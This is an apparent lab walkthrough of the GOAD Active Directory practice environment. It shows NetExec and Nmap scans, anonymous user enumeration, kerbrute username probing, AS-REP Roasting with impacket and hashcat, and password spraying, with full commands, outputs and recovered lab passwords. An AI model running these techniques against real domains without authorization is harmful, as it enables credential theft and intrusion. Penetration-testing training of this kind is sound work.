This article starts from zero and walks through the first round of information gathering in the GOAD lab: scanning the internal network, identifying the domain controllers, configuring hosts, enumerating domain users anonymously, and then moving on to AS-REP Roasting and password spraying to obtain the first set of usable credentials.

What this article covers

  • How to use NetExec and Nmap for a first pass of information gathering on the GOAD network
  • How to identify the domain controllers and the domain structure from SMB signing, LDAP and naming information
  • How to obtain initial domain users through anonymous enumeration, OSINT, AS-REP Roasting and password spraying
  • How to turn the scan results into a reusable target list for the rest of the domain engagement

Scanning and reconnaissance

Network scanning

A quick probe with NetExec

In a domain engagement, a first sweep of the Windows hosts on the subnet can be done with NetExec over SMB. Every host that answers reports its OS build, hostname, domain, and whether SMB signing is required:

nxc smb 192.168.56.0/24

[Screenshot: NetExec SMB scan results for the GOAD network]

From the output we can see there are three domains:

essos.local
sevenkingdoms.local
north.sevenkingdoms.local

Domain controllers require SMB signing by default, so the three hosts reporting signing:True are most likely the DCs. Signing can also be enforced on member servers by GPO, though, so treat it as a hint and confirm by checking which hosts actually answer on LDAP:

nxc ldap 192.168.56.0/24

[Screenshot: LDAP scan of the GOAD network identifying the domain controllers]

That confirms three domain controllers: KINGSLANDING (sevenkingdoms.local), WINTERFELL (north.sevenkingdoms.local) and MEEREEN (essos.local).

Configuring hosts

Kerberos tickets are issued for service principal names built from host names, and the KDC is located by name, so we need name resolution for the domains and hosts before any Kerberos-based tooling will work. Without a DNS server pointing at the DCs, the simplest option is to add the entries to the local hosts file:

# /etc/hosts
# GOAD
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12 essos.local meereen.essos.local meereen
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
192.168.56.23 braavos.essos.local braavos
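Writing the hosts file by hand is fine for five machines, but the same banner lines are the raw material for the target list this article aims to build. The script below is an added example, not code from the original post or from NetExec: it parses NetExec's SMB banner lines (the ones from the scan above, embedded so it runs offline), applies the signing:True heuristic for probable DCs, flags hosts that do not require signing (where relayed NTLM authentication over SMB would be accepted), and emits hosts-file entries. The DC heuristic is exactly that, so confirm it with the LDAP sweep as the post does.

```python
"""Turn NetExec SMB banner lines into a target list and hosts-file entries.

Added example, not code from the original post or from NetExec. SAMPLE_NXC_OUTPUT
is the banner output from the scan above; signing:True => probable DC is a
heuristic that the post confirms with an LDAP sweep.
"""
import re
from dataclasses import dataclass
from typing import List

SAMPLE_NXC_OUTPUT = """\
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
"""

# Only banner lines ([*]) carry the host facts; [+]/[-] login lines are skipped.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+\S+\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]+)\)\s+\(domain:(?P<domain>[^)]+)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


@dataclass
class SmbHost:
    ip: str
    name: str
    domain: str
    os: str
    signing: bool
    smbv1: bool

    @property
    def fqdn(self) -> str:
        return f"{self.name.lower()}.{self.domain.lower()}"


def parse_nxc_smb(text: str) -> List[SmbHost]:
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line.strip())
        if m:
            hosts.append(SmbHost(m["ip"], m["name"], m["domain"], m["os"],
                                 m["signing"] == "True", m["smbv1"] == "True"))
    return hosts


def domains(hosts: List[SmbHost]) -> List[str]:
    return sorted({h.domain.lower() for h in hosts})


def probable_dcs(hosts: List[SmbHost]) -> List[SmbHost]:
    """DCs require SMB signing by default; members normally do not. Heuristic only."""
    return [h for h in hosts if h.signing]


def relay_candidates(hosts: List[SmbHost]) -> List[SmbHost]:
    """Hosts that do not require signing accept relayed NTLM authentication over SMB."""
    return [h for h in hosts if not h.signing]


def hosts_file_lines(hosts: List[SmbHost]) -> List[str]:
    """One /etc/hosts line per host. DC lines also carry the bare domain name so that
    the domain itself resolves (Kerberos tooling often targets the domain, not a host)."""
    dc_ips = {h.ip for h in probable_dcs(hosts)}
    lines = []
    for h in hosts:
        names = [h.fqdn] + ([h.domain.lower()] if h.ip in dc_ips else []) + [h.name.lower()]
        lines.append(f"{h.ip} {' '.join(names)}")
    return lines


if __name__ == "__main__":
    found = parse_nxc_smb(SAMPLE_NXC_OUTPUT)
    print("domains:", domains(found))
    print("probable DCs:", [h.name for h in probable_dcs(found)])
    print("no SMB signing required:", [h.name for h in relay_candidates(found)])
    print("\n".join(hosts_file_lines(found)))
```

Feed it the saved output of the real scan (nxc smb 192.168.56.0/24 > smb.txt) instead of the embedded sample; the [-] and [+] lines from later authenticated runs are ignored, so the same parser works on every NetExec SMB sweep you keep.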

Full port scan with Nmap

To widen the attack surface, run a full port scan against the hosts found so far:

nmap -Pn -p- -sC -sV -oA full_scan 192.168.56.10-12,22-23

The options:

  • -Pn: skip host discovery (Windows hosts often drop ICMP, so a ping sweep would miss them).
  • -p-: scan all 65535 TCP ports.
  • -sC: run the default NSE scripts.
  • -sV: probe service versions.
  • -oA: write the results in all three formats (normal, greppable and XML) with the base name full_scan.

The output is long, so it is not reproduced here in full.

Analysing the scan results

Searching for sevenkingdoms.local and essos.local on Google is enough to tell that the naming scheme comes from Game of Thrones / A Song of Ice and Fire. This is a lab, but the same OSINT approach pays off in real engagements: a naming theme tells you which account names to guess.

[Screenshot: identifying the GOAD domain naming theme via Google]

Finding domain users

Anonymous enumeration of domain accounts on the DCs

nxc smb 192.168.56.0/24 --users

[Screenshot: domain user list obtained by anonymous enumeration]

On WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL we enumerate ten domain accounts, and the output also includes a password left in a user's description field:

samwell.tarly:Heartsbane

The account names also confirm that the OSINT lead from the previous step was the right one.

Enumerating domain usernames with ldapdomaindump, kerbrute and Nmap

With a valid credential, ldapdomaindump can pull the whole directory (users, groups, computers, policies) as HTML and JSON:

┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

This gives us every account in NORTH.SEVENKINGDOMS.LOCAL.

OSINT + brute-force account enumeration

We can use the OSINT from the scan analysis to guess account names, then generate them in the naming format already observed in the other domain (first.last, which is common in many real domains).

A simple shell script can scrape the character names from a web page:

#!/bin/bash

# Fetch the cast page and pull out "Firstname Lastname" strings sitting between tags
curl -s "https://www.hbomax.com/shows/game-of-thrones/4f6b4985-2dc9-4ab6-ac79-d60f0860b0ac/cast-and-crew" | \
grep -o '>[A-Z][a-z]* [A-Z][a-z]*<' | \
sed 's/>//g; s/<//g' | \
awk '
BEGIN { count = 0 }
{
    count++
    # Skip the first 11 matches and keep every other one after that;
    # these offsets were tuned by hand to this page's layout
    if (count > 11 && (count - 12) % 2 == 0) {
        # Convert to lowercase and replace spaces with dots -> first.last
        name = tolower($0)
        gsub(/ /, ".", name)
        print name
    }
}' | \
sort -u
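The script above hard-codes one convention (first.last). The following is an added example, not code from the original post, that generalises the step: given a handful of usernames already confirmed in one domain (here the ones from the anonymous enumeration on north.sevenkingdoms.local) and the OSINT name list, it detects which of the common AD naming conventions the organisation uses and then builds the wordlist in that format only. Both input lists are constructed from the post's own data; in practice the names come from the scraper and the known usernames from the other domain.

```python
"""Build a username wordlist from OSINT names in the convention a target uses.

Added example, not part of the original post. CHARACTERS and KNOWN_NORTH_USERS
are constructed from the post's own lists.
"""
import re
from typing import Callable, Dict, List, Tuple

# Common AD username conventions, keyed by a label.
FORMATS: Dict[str, Callable[[str, str], str]] = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast": lambda f, l: f"{f}{l}",
    "flast": lambda f, l: f"{f[0]}{l}",
    "f.last": lambda f, l: f"{f[0]}.{l}",
    "first.l": lambda f, l: f"{f}.{l[0]}",
    "last.first": lambda f, l: f"{l}.{f}",
    "lastf": lambda f, l: f"{l}{f[0]}",
}


def split_name(full_name: str) -> Tuple[str, str]:
    """'Jon Snow' -> ('jon', 'snow'): first and last token, punctuation stripped."""
    parts = [p for p in re.split(r"[^a-z]+", full_name.lower()) if p]
    if len(parts) < 2:
        raise ValueError(f"need at least two name parts: {full_name!r}")
    return parts[0], parts[-1]


def detect_format(known_usernames: List[str], full_names: List[str]) -> str:
    """Pick the convention that reproduces the most usernames we already know."""
    known = {u.lower() for u in known_usernames}
    scores = {}
    for label, fmt in FORMATS.items():
        generated = {fmt(*split_name(n)) for n in full_names}
        scores[label] = len(generated & known)
    best = max(scores, key=scores.get)
    if scores[best] == 0:
        raise ValueError("no convention matches the known usernames")
    return best


def wordlist_from_names(full_names: List[str], fmt_label: str) -> List[str]:
    """Render every name in the chosen convention, de-duplicated, order preserved."""
    fmt = FORMATS[fmt_label]
    seen, out = set(), []
    for n in full_names:
        u = fmt(*split_name(n))
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


# Constructed inputs: OSINT names, and usernames seen on north.sevenkingdoms.local.
CHARACTERS = ["Jon Snow", "Samwell Tarly", "Arya Stark", "Daenerys Targaryen",
              "Jorah Mormont", "Khal Drogo", "Robert Baratheon", "Jon Snow"]
KNOWN_NORTH_USERS = ["jon.snow", "samwell.tarly", "arya.stark", "hodor", "sql_svc"]

if __name__ == "__main__":
    label = detect_format(KNOWN_NORTH_USERS, CHARACTERS)
    print("detected convention:", label)
    print("\n".join(wordlist_from_names(CHARACTERS, label)))
```

Redirect the output to got_users.txt and hand it to kerbrute or the Nmap script as below; if detect_format raises, the target does not use any of the listed conventions and you should fall back to generating all of them.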

Then run username enumeration with kerbrute. It sends one AS-REQ per name: an unknown principal gets KDC_ERR_C_PRINCIPAL_UNKNOWN, an existing one gets KDC_ERR_PREAUTH_REQUIRED (or an AS-REP if pre-authentication is disabled), so no password is ever tried and no failed-logon events are generated, although a DC with Kerberos auditing enabled still records event 4768 with failure code 0x6:

┌──(kali㉿kali)-[~]
└─$ kerbrute userenum -d essos.local --dc 192.168.56.12 got_users.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:32:31 > Using KDC(s):
2025/12/21 06:32:31 > 192.168.56.12:88

2025/12/21 06:32:31 > [+] VALID USERNAME: daenerys.targaryen@essos.local
2025/12/21 06:32:31 > [+] VALID USERNAME: jorah.mormont@essos.local
2025/12/21 06:32:31 > [+] VALID USERNAME: khal.drogo@essos.local
2025/12/21 06:32:31 > [+] VALID USERNAME: viserys.targaryen@essos.local
2025/12/21 06:32:36 > Done! Tested 80 usernames (4 valid) in 5.003 seconds

Nmap's krb5-enum-users script does the same thing; here it is run against a different domain:

┌──(kali㉿kali)-[~]
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:32 EST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00035s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|   robert.baratheon@sevenkingdoms.local
|_  stannis.baratheon@sevenkingdoms.local
MAC Address: 00:0C:29:CC:C8:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Looking for unauthenticated SMB shares

Try a username that does not exist with an empty password. The DCs reject it, but a host with the Guest account enabled maps the unknown user to Guest and lets us list its shares:

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24 -u 'a' -p '' --shares
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.12 445 MEEREEN [-] essos.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.22 445 CASTELBLACK [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 192.168.56.23 445 BRAAVOS [*] Enumerated shares
SMB 192.168.56.23 445 BRAAVOS Share        Permissions   Remark
SMB 192.168.56.23 445 BRAAVOS -----        -----------   ------
SMB 192.168.56.23 445 BRAAVOS ADMIN$                     Remote Admin
SMB 192.168.56.23 445 BRAAVOS all          READ,WRITE    Basic RW share for all
SMB 192.168.56.23 445 BRAAVOS C$                         Default share
SMB 192.168.56.23 445 BRAAVOS CertEnroll                 Active Directory Certificate Services share
SMB 192.168.56.23 445 BRAAVOS IPC$         READ          Remote IPC
SMB 192.168.56.23 445 BRAAVOS public                     Basic Read share for all domain users
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

The all share on BRAAVOS is readable and writable as Guest, while public is only readable by domain users. Guest- or anonymous-writable shares like this are worth going through early: they often hold scripts, configs or backups containing credentials, and write access lets an attacker plant files that other users will open.

Having usernames but no password

AS-REP Roasting

If an account has "Do not require Kerberos preauthentication" set, the KDC hands out an AS-REP to anyone who asks for that user. The encrypted part of that reply is protected with a key derived from the user's password (for etype 23 it is the NT hash), so it can be cracked offline without ever sending a password to the DC. For example, we already have a batch of usernames for north.sevenkingdoms.local from ldapdomaindump:

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

Save them to users.txt and request an AS-REP for each one:

┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$[...]
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

Only brandon.stark has pre-authentication disabled, so we get his AS-REP hash (the two KDC_ERR_CLIENT_REVOKED lines are krbtgt and Guest, which are disabled accounts). Save the $krb5asrep$ line to asrephash.txt and crack it offline with hashcat; mode 18200 is Kerberos 5 AS-REP etype 23:

┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 asrephash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 6956/13913 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (11083 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$[...]:iseedeadpeople

That recovers brandon.stark's password: iseedeadpeople

Password spraying

Before spraying anything, pull the domain password policy (for example nxc smb 192.168.56.11 -u samwell.tarly -p Heartsbane --pass-pol) and keep the number of attempts per account inside one observation window below the lockout threshold; a failed Kerberos pre-authentication counts toward lockout just like a failed NTLM logon.

The first case is accounts whose password is the username (rare in practice, but cheap to test). With --no-bruteforce, nxc pairs the two files line by line (user1:pass1, user2:pass2) instead of trying every combination, so each account gets exactly one attempt:

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor

The second case is a weak password reused across accounts. kerbrute passwordspray tries one password against every user over Kerberos, which is fast and leaves Kerberos pre-authentication failures (event 4771) on the DC rather than the NTLM failure events (4625/4776) an SMB spray produces:

┌──(kali㉿kali)-[~]
└─$ kerbrute passwordspray -d north.sevenkingdoms.local --dc 192.168.56.11 users.txt hodor

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:56:44 > Using KDC(s):
2025/12/21 06:56:44 > 192.168.56.11:88

2025/12/21 06:56:44 > [+] VALID LOGIN: hodor@north.sevenkingdoms.local:hodor
2025/12/21 06:56:44 > Done! Tested 16 logins (1 successes) in 0.019 seconds

Summary

Over this first round we collected three sets of valid credentials:

  • samwell.tarly:Heartsbane (leaked in the user's description field)
  • brandon.stark:iseedeadpeople (AS-REP Roasting)
  • hodor:hodor (password spraying)

Many of the ideas here follow Mayfly's GOAD write-ups; the original series is worth reading.